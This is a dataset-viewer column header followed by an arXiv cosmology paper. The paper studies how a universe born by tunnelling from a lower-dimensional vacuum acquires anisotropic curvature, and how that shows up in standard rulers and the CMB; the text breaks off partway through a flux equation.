id
stringlengths 18
42
| text
stringlengths 0
3.39M
| added
stringlengths 24
24
| created
stringlengths 20
24
| source
stringclasses 4
values | original_shard_dir
stringclasses 158
values | original_shard_idx
int64 0
311k
| num_tokens
int64 1
569k
|
---|---|---|---|---|---|---|---|
proofpile-arXiv_065-5416 | \section{Introduction and Summary}
\label{Sec:Intro}
Our current understanding of cosmology and high energy physics leaves many questions unanswered. One of the most fundamental of these questions is why our universe has three large dimensions. This may be tied to the more general question of the overall shape and structure of the universe. In fact, it is possible that our universe was not always three dimensional or that other places outside of our observable universe have a different dimensionality. There are surely long-lived vacua where one or more of our three dimensions are compactified, since this does not even rely on the presence of extra-dimensions and indeed happens in the Standard Model \cite{ArkaniHamed:2007gg}. Eternal inflation can provide a means to populate these vacua, and naturally leads to a highly inhomogeneous universe on very long length scales. Further, it seems likely that these lower-dimensional vacua are at least as numerous as three dimensional ones since there are generally more ways to compactify a greater number of spatial dimensions. If we do indeed have a huge landscape of vacua (e.g.~\cite{Bousso:2000xa}) then it seems all the more reasonable that there should be vacua of all different dimensionalities and transitions between them (see e.g.~\cite{Krishnan:2005su, Carroll:2009dn, BlancoPillado:2009di, BlancoPillado:2009mi, Wu:2003ht}). We will ignore the subtle issues of the likelihood of populating those vacua (the ``measure problem"). Instead we will focus on the possibility of observing such regions of lower dimensionality since surely such a discovery would have a tremendous effect on our understanding of cosmology and fundamental physics.
Our compact dimensions are generically unstable to decompactification \cite{Giddings:2004vr}. Thus it seems possible that the universe began with all the dimensions compact (the starting point in \cite{Brandenberger:1988aj, Greene:2009gp} for example). In this picture our current universe is one step in the chain towards decompactifying all dimensions. Of course, eternal inflation may lead to a very complicated history of populating different vacua, but in any case, it seems reasonable to consider the possibility that we came from a lower dimensional ``ancestor" vacuum. We will assume that prior to our last period of slow-roll inflation our patch of the universe was born in a transition from a lower dimensional vacuum.
Our universe then underwent the normal period of slow-roll inflation. For our signals to be observable we will assume that there were not too many more than the minimal number of efolds of inflation necessary to explain the CMB sky. This may be reasonable because this is very near a catastrophic boundary: large scale structures such as galaxies would not form if inflation did not last long enough to dilute curvature sufficiently \cite{Vilenkin:1996ar, Garriga:1998px, Freivogel:2005vv}. Since achieving slow-roll inflation is difficult and the longer it lasts the more tuned the potential often is, there may be a pressure to be close to this lower bound on the length of inflation. We will actually use the energy density in curvature, $\Omega_k$, in place of the number of efolds of inflation. The observational bound requires that $\Omega_k \lesssim 10^{-2}$ today (this corresponds to $\sim 62$ efolds for high scale inflation). The existence of galaxies requires $\Omega_k \lesssim 1$ today (corresponding to $\sim 59.5$ efolds if we use the bound from \cite{Freivogel:2005vv}). Thus $\Omega_k$ may be close to the observational bound today. Other, similar arguments have also been made for a relatively large curvature today \cite{Bozek:2009gh}.
Most signals of the presence of other vacua, e.g.~bubble collisions \cite{Aguirre:2007an, Chang:2007eq, Chang:2008gj}, also rely on this assumption. These signals have also mostly been explored assuming that the other vacua are all 3+1 dimensional. While an important first step, this seems like a serious oversimplification. We find interesting differences in the case that our parent vacuum was lower dimensional. In particular, our universe can be anisotropic, with different spatial curvatures in the different directions. This anisotropic curvature dilutes exponentially during inflation, making the universe appear very isotropic at early times. However, this curvature ($\Omega_k$) grows at late times, leading to several observable effects. This anisotropic curvature sources an anisotropy in the Hubble expansion rate, since the different dimensions expand at different rates. The most interesting signal is an anisotropy in the normal CMB curvature measurement. The angular size of a ``standard ruler" now appears to depend on the orientation of that ruler. In the CMB this shows up as unexpected correlations between modes of all angular sizes. Unlike the normal curvature measurement, this anisotropic curvature measurement is not degenerate with the scale factor expansion history and is thus easier to measure. This anistropic curvature also leads to a significant quadrupolar anisotropy in the CMB which constrains the size of $\Omega_k$. There are possibly other observables from 21 cm measurements, direct measurements of the Hubble expansion (e.g.~from supernovae), or from searches looking for nontrivial topology of the universe.
\begin{comment}
in general we know we have at least 3 dims, some of which may have been small in the past
there are probably at least as many vacua with more dimensions compactified as there are 3-dimensional ones
in fact even SM has a "landscape" of lower dimensional vacua \cite{ArkaniHamed:2007gg}
these authors also see the landscape as made up of vacua with all different dimensionalities \cite{Carroll:2009dn}
landscape seems motivated by CC problem and extra dims/string theory
up to the proposed signals of landscape all involve only vacua with 3 spatial dims, but no reason for this
in fact it seems reasonable to assume universe started with all dims compact
there may be a catastrophic boundary at 59.5 efolds of inflation to dilute curvature \cite{Freivogel:2005vv}. given that getting inflation at all is hard, this motivates a small number of efolds. others argue similar predictions for large curvature ("open inflation") \cite{Garriga:1998px, Vilenkin:1996ar}. almost all landscape signals require this.
entropics also predicts large curvature \cite{Bozek:2009gh}
bubble collisions generically needs low inflation too \cite{Aguirre:2007an, Chang:2007eq, Chang:2008gj}
if we did tunnel from a lower dimensional vacuum and had only ~60 efolds then the universe would have a (small) anisotropy, inducing a quadrupole but also in particular in the curvature. this can constrain our anisotropic curvature much better than normal curvature can be constrained. quickly summarize our results.
refer to in the intro?: \cite{Greene:2009gp}
dimensions naturally want to expand \cite{Giddings:2004vr}
\end{comment}
\section{The Anisotropic Universe}
\label{Sec: metric}
In this section we will compute the evolution of a universe that began with one or two of our three spatial dimensions compactified.
\subsection{The Initial Transition}
We will consider the possibility that our universe began in a lower-dimensional vacuum. In particular we assume that just prior to our recent period of slow-roll inflation, the currently observable part of the universe (our ``pocket universe" in landscape terminology) was in a vacuum with only one or two large, uncompactified spatial dimensions. The other dimensions, including the one or two that will eventually become part of our three large spatial dimensions, are compactified and stable. The universe then tunnels, nucleating a bubble of our vacuum in which three spatial dimensions are uncompactified and thus free to grow with the cosmological expansion. We will consider starting from either a 1+1 or 2+1 dimensional vacuum. We will not consider the 0+1 dimensional case in great detail, as it is significantly different \cite{ArkaniHamed:2007gg}. However it is possible that it will have the same type of signatures as we discuss for the other two cases, depending on the details of the compactification manifold.
Consider first the case that the universe is initially 2+1 dimensional, and in the tunneling event one of the previously compactified spatial dimensions becomes decompactified, losing whatever forces were constraining it and becoming free to grow (in the tunneling event it may also grow directly). We can think of this as a radion for that dimension which is initially trapped in a local minimum, tunneling to a section of its potential where it is free to roll. Of course, the tunneling event may actually be due to a change in the fluxes wrapping the compact dimension, or in general to a change in whatever is stabilizing that dimension. The exact nature of this tunneling will not concern us since the further evolution of the universe is relatively insensitive to this. In all cases a bubble of the new vacuum is formed in the original 2+1 dimensional space. The bubble wall (which is topologically an $S^1$ not an $S^2$) expands outward. The interior of this Coleman-De Luccia bubble \cite{Coleman:1980aw} is an infinite, open universe with negative spatial curvature (see e.g.~\cite{Bousso:2005yd} for this bubble in arbitrary dimensionality space-times). But this negative spatial curvature is only in two dimensions. The third, previously small, dimension may be topologically an $S^1$ or an interval, but in any case will not have spatial curvature. Thus the metric after the tunneling inside the bubble is
\begin{equation}
\label{eqn:anisotropic metric}
ds^2 = dt^2 - a(t)^2 \left( \frac{dr^2}{1-k r^2} + r^2 d \phi^2 \right) - b(t)^2 dz^2
\end{equation}
where $z$ is the coordinate of the previously compactified dimension and $k=-1$ for negative spatial curvature in the $r-\phi$ plane. This is known as a Bianchi III spactime.
If instead the universe is initially 1+1 dimensional and two spatial dimensions decompactify in the transition then the situation will be reversed. The single originally large dimension (now labelled with coordinate $z$) will be flat but the other two dimensions may have curvature (either positive or negative). For example, if they were compactified into an $S^2$ they would have positive curvature and so would be described by Eqn.~\eqref{eqn:anisotropic metric} with $k=+1$, known as a Kantowski-Sachs spacetime. Or if those two dimensions were a compact hyperbolic manifold, for example, they would be negatively curved with $k=-1$. In fact, generically compactifications do have curvature in the extra dimensions (see for example \cite{Silverstein:2004id}). Of course it is also possible that the two compact dimensions had zero spatial curvature. We will not consider this special case in great detail since it does not lead to most of our observable signals.
\subsection{Evolution of the Anisotropic Universe}
We will thus assume that our universe begins with anisotropic spatial curvature, with metric as in Eqn.~\eqref{eqn:anisotropic metric}. Immediately after the tunneling event the universe is curvature dominated, though in this case of course the curvature is only in the $r-\phi$ plane. We assume the universe then goes through the usual period of slow-roll inflation, with a low number of efolds $\lesssim 70$ near the curvature bound.
The equations of motion (the ``FRW equations") are:
\begin{eqnarray}
\label{eqn: FRW eqn1}
\frac{\dot{a}^2}{a^2} + 2 \frac{\dot{a}}{a} \frac{\dot{b}}{b} + \frac{k}{a^2} & = & 8 \pi G \rho \\
\label{eqn: FRW eqn2}
\frac{\ddot{a}}{a} + \frac{\ddot{b}}{b} + \frac{\dot{a}}{a} \frac{\dot{b}}{b} & = & - 8 \pi G p_r \\
\label{eqn: FRW eqn3}
2 \frac{\ddot{a}}{a} + \frac{\dot{a}^2}{a^2} + \frac{k}{a^2} & = & - 8 \pi G p_z
\end{eqnarray}
where the dot $\dot{\,}$ denotes $\frac{d}{dt}$, $\rho$ is the energy density, and $p_r$ and $p_z$ are the pressures in the $r$ and $z$ direction, i.e.~the $rr$ and $zz$ components of the stress tensor $T^\mu_\nu$. These can be rewritten in terms of the two Hubble parameters $H_a \equiv \frac{\dot{a}}{a}$ and $H_b \equiv \frac{\dot{b}}{b}$ as
\begin{eqnarray}
\label{eqn: FRW H eqn1}
H_a^2 + 2 H_a H_b + \frac{k}{a^2} & = & 8 \pi G \rho \\
\label{eqn: FRW H eqn2}
\dot{H_a} + H_a^2 + \dot{H_b} + H_b^2 + H_a H_b & = & - 8 \pi G p_r \\
\label{eqn: FRW H eqn3}
2 \dot{H_a} + 3 H_a^2 + \frac{k}{a^2} & = & - 8 \pi G p_z
\end{eqnarray}
At least in the case of tunneling from 2+1 to 3+1 dimensions, immediately after the tunneling event the universe is curvature dominated. In this case Eqn.~\eqref{eqn: FRW eqn3} can be solved for $a$ directly. Since this is just the usual isotropic FRW equation, the solution is as usual $a(t) \sim t$, where $t = 0$ is the bubble wall. Actually, since we will assume the universe transitions to a period of slow-roll inflation after curvature dominance, we will assume there is a subdominant vacuum energy during the period of curvature dominance. This then gives a perturbutive solution accurate up to linear order in the vacuum energy $\Lambda$ of $a(t) \approx t \left( 1 + \frac{4 \pi}{9} G \Lambda t^2 \right)$. Then we can solve Eqn.~\eqref{eqn: FRW eqn1} perturbatively for $b(t)$. There are several possible solutions but these are reduced because we will assume that immediately after the tunneling event $\dot{b} = 0$. If we imagine the transition as a radion field tunneling through a potential barrier then we know that the radion generically starts from rest after the tunneling. With this boundary condition the solution to linear order in the vacuum energy is $b(t) \approx b_i \left( 1 + \frac{4 \pi}{3} G \Lambda t^2 \right)$ where $b_i$ is the initial value of $b$. Since the period of curvature dominance ends when $t^2 G \Lambda \sim 1$, we see that roughly $a$ expands linearly while $b$ remains fixed during this period. Thus the different expansion rates $H_a$ and $H_b$ remain very different during this period. $H_a$ is large while $H_b \approx 0$. The flat dimension will not begin growing rapidly until inflation begins. At that point though, it will be driven rapidly towards the same expansion rate as the other dimensions, $H_a \approx H_b$, as we will now show.
Since our observed universe is approximately isotropic, we will only need to solve these equations in the limit of small $\Delta H \equiv H_a - H_b$. We will always work to linear order in $\Delta H$. Subtracting Eqn.~\eqref{eqn: FRW H eqn2} - Eqn.~\eqref{eqn: FRW H eqn3} gives
\begin{equation}
\label{eqn: delta H}
\frac{d}{dt} \Delta{H} + 3 H_a \, \Delta H + \frac{k}{a^2} = 8 \pi G \left( p_r - p_z \right) \approx 0
\end{equation}
Note that we have taken the pressure to be isotropic, $p_r = p_z \equiv p$, which is approximately true in all cases of interest to us. This is clearly true during inflation. During radiation dominance (RD) the radiation is in thermal equilibrium. Since the reactions keeping it in equilibrium have rates much higher than the Hubble scales during this time, the pressure is kept locally isotropic. During matter dominance (MD) the pressure is zero to leading order. The sub-leading order piece due to the photons will also remain isotropic until after decoupling since the photons remain in equilibrium until this time. After decoupling the energy density in radiation is quite small compared to the matter density. Further, this small pressure only develops anisotropy due to the differential expansion (and hence redshifting) between the $r$ and $z$ directions. Thus the anisotropy in pressure is proportional to both $\Delta H$ and the small overall size of the pressure and is therefore negligible for us.
The anisotropic spatial curvature in the metric \eqref{eqn:anisotropic metric} is the only effect breaking isotropy in this universe and thus the only reason for a differential expansion rate $\Delta H$. In fact, as we will see shortly, the differential expansion $\Delta H$ is proportional to $\Omega_k$, the curvature energy density, defined to be
\begin{equation}
\Omega_k \equiv \frac{\frac{k}{a^2}}{H_a^2}.
\end{equation}
Since $\Omega_k$ grows during RD and MD and it is $\ll 1$ today, it was quite small during the entire history of the universe after the period of curvature dominance (to which we will return later). So we will treat both $\Delta H$ and $\Omega_k$ as our small parameters and work to linear order in each.
If we combine Eqns.~\eqref{eqn: FRW H eqn3} and \eqref{eqn: delta H} we find an equation for $H_b$ which is true in the limit of small $\Delta H$
\begin{equation}
2 \dot{H_b} + 3 H_b^2 - \frac{k}{a^2} = - 8 \pi G p.
\end{equation}
Notice that this is exactly the same as the equation for $H_a$ (Eqn.~\eqref{eqn: FRW H eqn3}) but with the sign of the curvature term flipped. Eqn.~\eqref{eqn: FRW H eqn3} for $H_a$ is just the usual isotropic FRW equation. Thus $a(t)$ behaves exactly as it would in the normal isotropic universe with a subleading curvature component and $b(t)$ behaves as if it was the scale factor in a universe with an equal magnitude but opposite sign of curvature.
Eqn.~\eqref{eqn: delta H} can be solved easily because we only need the leading order behavior of $a$ and $H_a$ which are just the usual isotropic FRW solutions as can be seen easily since Eqns.~\eqref{eqn: FRW eqn3} and \eqref{eqn: FRW H eqn3} are just the usual FRW equations. Solving Eqn.~\eqref{eqn: delta H} during the eras of interest and keeping only the inhomogeneous solutions yields
\begin{eqnarray}
\text{Inflation} \phantom{xRD} & \frac{\Delta H}{H_a} & = - \Omega_k \\
\text{RD} \phantom{xxxRD} & \frac{\Delta H}{H_a} & = - \frac{1}{3} \Omega_k \\
\text{MD} \phantom{iiixRD} & \frac{\Delta H}{H_a} & = - \frac{2}{5} \Omega_k
\end{eqnarray}
As we will show later, the homogeneous solutions all die off as faster functions of time and are thus negligible. Interestingly, this implies that $\Delta H$ is effectively independent of initial conditions. At every transition some of the homogeneous solution for $\Delta H$ is sourced, for example to make up the missing $- \frac{2}{3} \Omega_k$ when transitioning from inflation to RD. But this homogeneous piece dies off faster, leaving only the inhomogeneous piece which is independent of the initial value of $\Delta H$.
To find the solutions for the scale factors $a(t)$ and $b(t)$ up to linear (subleading) order in the curvature, we solve Eqns.~\eqref{eqn: FRW eqn1}, \eqref{eqn: FRW eqn2}, and \eqref{eqn: FRW eqn3} perturbatively in $\Omega_k$. The leading order behavior comes from the dominant energy density (vacuum energy, radiation, or matter in our three eras). We will only need the solution during MD so we can assume $p_r = p_z = 0$ then. Eqn.~\eqref{eqn: FRW eqn3} contains no $b$'s so it can be solved directly for $a(t)$. Once we have the solution for $a(t)$ up to linear order in $\Omega_k$ we then plug in to Eqn.~\eqref{eqn: FRW eqn2} to find $b(t)$ also to linear order. The solutions during MD to linear order in $\Omega_k$ are
\begin{eqnarray}
a(t) = c_0 \, t^\frac{2}{3} \left( 1 - \frac{9 k}{20 c_0^2} \, t^\frac{2}{3} \right) \approx c_0 \, t^\frac{2}{3} \left( 1 - \frac{\Omega_k}{5} \right) \\
b(t) = c_0 \, t^\frac{2}{3} \left( 1 + \frac{9 k}{20 c_0^2} \, t^\frac{2}{3} \right) \approx c_0 \, t^\frac{2}{3} \left( 1 + \frac{\Omega_k}{5} \right)
\end{eqnarray}
where $c_0$ is an arbitrary, physically meaningless constant arising from the coordinate rescaling symmetry.
Thus this universe always has a differential expansion rate between the $z$ direction and the $r$-$\phi$ directions which is proportional to $\Omega_k$. The precise constant of proportionality depends only on the era (inflation, RD, or MD) and not on initial conditions. Further, the $r$-$\phi$ plane expands as in the usual isotropic FRW universe, while the $z$ direction expands as if it was in that same universe except oppositely curved.
During an initial period of curvature dominance the $z$ dimension remains constant while the other two dimensions expand, diluting curvature. During this period the expansion rates $H_a$ and $H_b$ are maximally different. Then a period of slow-roll inflation takes over. During this period the expansion rates are driven exponentially close together. This difference in expansion rates is largest at the beginning of inflation, immediately after curvature dominance, when $\Omega_k$ is still large. During inflation curvature dilutes exponentially as $\Omega_k \propto a^{-2}$. So at the end of inflation the differential expansion rate is completely negligible $\frac{\Delta H}{H} \sim e^{-60}$. Then during RD $\Omega_k$ and hence also $\Delta H$ remain small, though growing as $\propto a^2$. During MD $\Omega_k$ and $\Delta H$ continue to grow $\propto a$, finally reaching their maximal value when the universe transitioned to vacuum energy dominance around redshift $\sim 2$. Since this final transition was so recent (and the homogeneous solution for $\Delta H$ has not even had much time to die off yet) we will approximate the universe as matter dominated until today.
\section{Observables}
\label{Sec: Observables}
In this section, we discuss the late time observables of anisotropic curvature. We begin by computing its effects on standard rulers. These effects emerge due to the warping of null geodesics in the anisotropic background metric. Null geodesics along different directions are warped differently by the curvature, leading to differences in the observed angular size of standard rulers in the sky. Following this discussion, we compute the effect of anisotropic curvature on the CMB. The CMB is also affected by the warping of the null geodesics that propagate from the surface of last scattering to the current epoch. This warping affects the relation between the angle at which a CMB photon is observed today and the point at which it was emitted during recombination. In addition to this effect, the anisotropic metric discussed in Section \ref{Sec: metric} also leads to differential Hubble expansion. This leads to an anisotropic red shift in the universe, which causes a late time observer to see additional temperature anisotropies in the CMB. We conclude the section with a discussion of additional measurements that could be performed in upcoming experiments.
\subsection{Standard Rulers}
\label{SubSec:Rulers}
In this Section we present a calculation of the effect on standard rulers. While this is not a directly observable effect itself since we have no exact standard rulers in the sky, it does provide good intuition for the following calculation of the actual CMB observables in Section \ref{SubSec:CMB}. Further, many of the results of this section are used directly in that calculation.
The spacetimes \eqref{eqn:anisotropic metric} considered in this paper are curved and anisotropic. A canonical method to observe curvature is through the measurement of the angular sizes of standard rulers. Curvature modifies the Euclidean relationship between the measured angle and the linear size of the ruler. In a universe with anisotropic curvature, we expect this deviation from Euclidean geometry to change with the angular position and orientation of the ruler.
Motivated by the use of baryon acoustic oscillations as cosmological standard rulers, we compute the present day angular size of standard rulers located at the surface of last scattering. This calculation gives intuition for the effects of anisotropic curvature on the CMB (studied in detail in section \ref{SubSec:CMB}). To do so, we first determine the null geodesics that connect the surface of last scattering to a present day observer. The angle subtended between the two null geodesics that reach the end points of the standard ruler is then the angular size of the ruler. For simplicity, we assume that the universe was matter dominated throughout the period between recombination and the present epoch.
We work with the metric
\begin{eqnarray}
ds^{2} & = & dt^{2} - a\left( t \right)^{2} \left( dr^{2} + \sinh^{2}\left( r \right) d\phi^2 \right) - b\left( t \right)^2 dz^2
\label{Eqn:sinhmetric}
\end{eqnarray}
which is produced when a $3+1$ dimensional universe is produced by tunneling from a $2+1$ dimensional vacuum. We restrict our attention to this scenario in order to facilitate concrete computation. However, our results can be applied to a wide class of scenarios that lead to anisotropic geometries. The metric \eqref{Eqn:sinhmetric} describes a universe where two of the spatial dimensions (parameterized by the coordinates $\left( r, \phi \right)$ in \eqref{Eqn:sinhmetric}) have negative curvature and grow with scale factor $a\left( t \right)$. The other dimension, parameterized by the coordinate $z$ in \eqref{Eqn:sinhmetric}, grows with scale factor $b\left( t \right)$. The space-time geometry of such a universe can also be described using the metric \eqref{eqn:anisotropic metric} with $k = -1$. These metrics are related by a coordinate transformation and they yield identical FRW equations \eqref{eqn: FRW eqn1}, \eqref{eqn: FRW eqn2} and \eqref{eqn: FRW eqn3} for the scale factors $a\left( t \right)$ and $b\left( t \right)$. Th
is setup also describes anisotropic universes with positive curvature (equation \eqref{eqn:anisotropic metric} with $k=+1$). Such a universe is described by the metric \eqref{Eqn:sinhmetric} with the $\sinh^{2}\left( r \right)$ term replaced by $\sin^{2}\left( r \right)$. With this metric, the FRW (equations \eqref{eqn: FRW eqn1}, \eqref{eqn: FRW eqn2} and \eqref{eqn: FRW eqn3}) and null geodesic equations \eqref{Eqn:Geodesics} have the same parametric forms. Our calculations also apply to this case, with the difference between the two cases being captured by the sign of the curvature term $\Omega_k$.
\begin{figure}
\begin{center}
\includegraphics[width = 4.0 in]{geodesics.pdf}
\caption{ \label{Fig:geodesics} A depiction of the motion of a photon (red curve) from a point P on the surface of last scattering $\Sigma$ (black ellipse) to an observer O. Without loss in generality, the observer's position can be taken as the origin of the coordinate system. The anisotropic curvature causes $\Sigma$ to deviate from sphericity and warps the photon trajectories. $\theta_0$ is the angle between the photon's trajectory and the observer O's $z$ axis. $\theta_P$ is the angle between the photon's trajectory and the $z$ axis at $P$.}
\end{center}
\end{figure}
An observer O (see figure \ref{Fig:geodesics}) at the present time receives photons from the surface of last scattering $\Sigma$. This photon follows a null geodesic. In computing this null geodesic, we can assume without loss in generality that the point O lies at the origin of the coordinate system. With this choice, we focus on geodesics that lie along a direction of constant $\phi$. These geodesics contain all the information required to describe our setup. The geodesics that connect the point O with the surface of last scattering have zero velocity along the $\phi$ direction. The $O\left( 2 \right)$ symmetry in the $\left( r, \phi \right)$ plane then implies that $\phi$ remains constant during the subsequent evolution of the geodesic. Using the metric \eqref{Eqn:sinhmetric}, the null geodesic equations that describe the photon's trajectory $\left( r\left( t \right), z \left( t \right) \right)$ are
\begin{eqnarray}
\nonumber
\ddot{r} + \dot{r} H_a \left( 1 + \frac{\Delta H}{H_a} \left( 1 - \dot{r}^2 a\left( t \right)^2 \right) \right)& =&0 \\
\ddot{z} + \dot{z} H_b \left( 1 - \frac{\Delta H}{H_b} \left( 1 - \dot{z}^2 b\left( t \right)^2 \right) \right)& = &0
\label{Eqn:Geodesics}
\end{eqnarray}
where the dots denote derivatives with respect to $t$. With the boundary condition that the null geodesic reaches O at time $t_0$, equation \eqref{Eqn:Geodesics} can be solved perturbatively to leading order in $\Omega_k$. The coordinates $\left( r_P, z_P \right)$ on $\Sigma$ from which the photon is emitted are
\begin{eqnarray}
\nonumber
r_P &=& \sin \alpha \, \frac{3 \, t_0^{\frac{1}{3}}}{c_0} \, \left( 1 - \frac{\Omega_{k_0}}{3}\left( \frac{4}{5} + \cos 2 \alpha \right) \right) \\
z_P &=& \cos \alpha \, \frac{3 \, t_0^{\frac{1}{3}}}{c_0} \, \left( 1 - \frac{\Omega_{k_0}}{3}\left( -\frac{4}{5} + \cos 2 \alpha \right) \right)
\label{Eqn:Coordinates}
\end{eqnarray}
In the above expression, $\alpha$ is a parameter that governs the direction in the $\left( r, z \right)$ plane from which the photon is received at O and $\Omega_{k_0}$ denotes the fractional energy density in curvature at the present time. The physical angle $\theta$ between the photon's trajectory and the $z$ axis, as measured by a local observer, is different from $\alpha$, and is given by
\begin{eqnarray}
\tan \left(\theta\right) &=& \left( \frac{a\left( t \right)}{b\left( t \right)} \frac{dr}{dz}\right) + \mathcal{O} \left( H_a\right)
\label{Eqn:thetadefinition}
\end{eqnarray}
For the geodesics computed in \eqref{Eqn:Coordinates}, the relation between the parameter $\alpha$ and the physical angle $\theta_0$ observed at O is
\begin{eqnarray}
\tan \left(\theta_0\right) & = &\left( 1 - \frac{2}{5} \Omega_{k_0}\right) \, \tan \alpha
\end{eqnarray}
The $\mathcal{O} \left( H_a \right)$ corrections in the definition \eqref{Eqn:thetadefinition} arise because the coordinates $\left( t, r, \phi, z \right)$ used to describe the metric \eqref{Eqn:sinhmetric} are not locally flat. Local coordinates $\left( \tilde{t}, \tilde{r}, \tilde{\phi}, \tilde{z} \right)$ can be constructed at any point $\left( t_Q, r_Q, \phi_Q, z_Q \right)$ of the space-time. These two sets of coordinates are related by
\begin{eqnarray}
\nonumber
t & = & t_Q + \tilde{t} - \frac{1}{2}\left( a\left( t \right)^{2} H_a \left( \tilde{r}^2 + \sinh^{2}\left( r_Q \right) \, \tilde{\phi}^{2} \right) + b\left( t \right)^2 H_b \tilde{z}^2 \right) \\
\nonumber
r & = & r_Q + \tilde{r} - \frac{1}{2} \left( 2 \, H_a \, \tilde{r} \, \tilde{t} \, - \, \cosh \left( r_Q\right) \, \sinh \left( r_Q\right) \, \tilde{\phi}^2\right) \\
\nonumber
\phi & = & \phi_Q + \tilde{\phi} - \tilde{\phi} \left( H_a \, \tilde{t} \, + \, \coth \left( r_Q\right) \, \tilde{r} \right) \\
z & = & z_Q + \tilde{z} \left( 1 - H_b \, \tilde{t} \right)
\label{Eqn:LocalCoordinates}
\end{eqnarray}
The coordinate transformations in \eqref{Eqn:LocalCoordinates} imply that operators constructed from global coordinates ({\it e.g.} $\frac{d}{dr}$) differ from the corresponding operator in the local inertial frame ({\it e.g.} $\frac{d}{d\tilde{r}}$) by quantities $\sim \mathcal{O} \left( H_a \tilde{r}\right)$. The difference between these operators is suppressed by the ratio of the size of the local experiment over the Hubble radius. These differences are negligible for any local experiment today. The angle defined by \eqref{Eqn:thetadefinition} is therefore very close to the physical angle measured by a local experiment and we will use this definition for subsequent calculations.
\begin{figure}
\begin{center}
\includegraphics[width = 4.5 in]{rulers.pdf}
\caption{ \label{Fig:rulers} The effect of the anisotropic curvature on a measurement of the angular size of standard rulers. The black ellipse is the surface of recombination and the red lines are photon paths from standard rulers on this surface to the observer at O. The standard rulers are depicted by the thick straight lines. The angular size varies depending upon the location and orientation of the ruler.}
\end{center}
\end{figure}
With the knowledge of the geodesics \eqref{Eqn:Coordinates}, we can calculate the angular size of a standard ruler of length $\Delta L$ at the time of recombination. Since $\Omega_k$ is very small during this time, the physical size of the ruler is independent of its location and orientation. First, consider a ruler oriented in the $z$ direction. This ruler lies between the co-ordinates $\left( r \left( t_{r} \right), z \left( t_r \right) \right) $ and $\left( r \left( t_{r} \right) + \Delta r, z \left( t_r \right) + \Delta z\right)$ at the time $t_r$ of recombination. The length of this ruler is
\begin{eqnarray}
\left( a\left( t_r \right) \Delta r \right)^{2} + \left( b \left( t_r \right) \Delta z \right)^{2} & = & \Delta L ^2
\label{Eqn:RulerSize}
\end{eqnarray}
Using \eqref{Eqn:Coordinates} and \eqref{Eqn:thetadefinition} in \eqref{Eqn:RulerSize}, we find that the angular size $\Delta \theta$ subtended by a ruler of length $\Delta L$ at a local experiment O is
\begin{eqnarray}
\Delta \theta \left( \theta \right) & = & \frac{\Delta L}{3 \, t_r^{\frac{2}{3}} \, t_0^{\frac{1}{3}}} \left( 1 + \frac{\Omega_{k_0}}{5} \cos 2 \theta \right)
\label{Eqn:AngleChange}
\end{eqnarray}
A similar procedure can also be adopted to describe standard rulers that lie along the $\left( r, \phi \right)$ plane. The angular size of these rulers is given by the angle $\phi$ between the null geodesics that connect the ends of the ruler to the origin. Following the above procedure, this angular size $\Delta \phi$ is
\begin{eqnarray}
\Delta \phi & = & \frac{\Delta L}{3 \, t_r^{\frac{2}{3}} \, t_0^{\frac{1}{3}}} \left( 1 + \frac{3}{5} \, \Omega_{k_0}\right)
\label{Eqn:rphiangle}
\end{eqnarray}
The angular size of a standard ruler thus changes when its location and orientation are changed (see figure \ref{Fig:rulers}). For a ruler located at $z = 0$ ({\it i.e.} $\theta = \frac{\pi}{2}$) the warp of the angle (in equations \eqref{Eqn:AngleChange} and \eqref{Eqn:rphiangle}) changes from $\left( 1 + \frac{3}{5} \, \Omega_{k_0}\right)$ for a ruler in the $\left( r, \phi \right)$ plane to $\left( 1 - \frac{1}{5} \, \Omega_{k_0}\right)$ for a ruler oriented in the $z$ direction. Similarly, as a ruler oriented in the $z$ direction is moved from $\theta_0 = 0$ to $\theta_0 = \frac{\pi}{2}$, the angular warp factor changes from $\left( 1 - \frac{1}{5} \, \Omega_{k_0}\right)$ to $\left( 1 + \frac{1}{5} \, \Omega_{k_0}\right)$. The reason for this change can be traced to the fact that for a ruler oriented in the $z$ direction, all of the angular warp occurs due to the effect of the curvature on the scale factor. $a\left( t \right)$ and $b\left( t \right)$ expand as though they have the same magnitude of the curvature but with opposite sig
n. Consequently, the angular warps along the two directions also have the same magnitude, but are of opposite sign. This angular dependence is an inevitable consequence of the anisotropic curvature $\Omega_k$ endemic to this metric. We note that this measurement of the anisotropic curvature is relatively immune to degeneracies from the cosmological expansion history since the angular size changes depending upon the orientation of the ruler along every line of sight. We discuss how this measurement can be realized using CMB measurements in section \ref{SubSec:StatisticalAnisotropy}.
\subsection{Effect on the CMB}
\label{SubSec:CMB}
The CMB offers a unique probe of the space-time geometry between the surface of last scattering and the current epoch. The spectral characteristics of the CMB photons at the time of last scattering are well determined. Differences between this well determined spectrum and observations of the local flux of CMB photons arise during the propagation of the photons from recombination to the present epoch. These differences can be used to trace the space-time geometry since these photons travel along null geodesics of the geometry. In this section, we use the trajectories of CMB photons computed in sub section \ref{SubSec:Rulers} to derive the spectrum of the CMB flux observed today.
The CMB flux observed at O (see figure \ref{Fig:geodesics}) is
\begin{eqnarray}
\Phi_0 \left( E_0 \right) & = & \frac{dN_0\left( E_0 \right)}{\sin\theta_0 d\theta_0 d\phi_0 dA_0 dt_0 dE_0}
\label{Eqn:flux}
\end{eqnarray}
where $dN_0\left( E_0 \right)$ is the number of photons with energies between $E_0$ and $E_0 + dE_0$ received at O within a solid angle $\sin\theta_0 d\theta_0 d\phi_0$ in an area $dA_0$ during a time $dt_0$. The angle $\theta_0$ is defined as per \eqref{Eqn:thetadefinition} since that definition corresponds to the physical angle that a local observer measures between the photon's trajectory and the $z$ axis. The photons that are received at O within this solid angle were emitted from the point P on the surface of last scattering $\Sigma$ (see figure \ref{Fig:geodesics}). Since the geometry of the universe (equation \eqref{Eqn:sinhmetric}) is curved, the solid angle $\sin\theta_P d\theta_P d\phi_P$ is different from the solid angle at O. The energy $E_P$ at which the photon is emitted is also different from the energy $E_0$ at which it is received owing to the expansion of the universe. Furthermore, due to the differential expansion of the $\left( r, \theta \right)$ plane and the $z$ directi
on, this energy shift is also a function of the solid angle. The photons received in the space-time volume $dA_0\, dt_0$ are emitted from a volume $dA_P \, dt_P$. The ratio of these volume elements is proportional to the expansion of the universe. Incorporating these effects, the flux \eqref{Eqn:flux} can be expressed as
\begin{eqnarray}
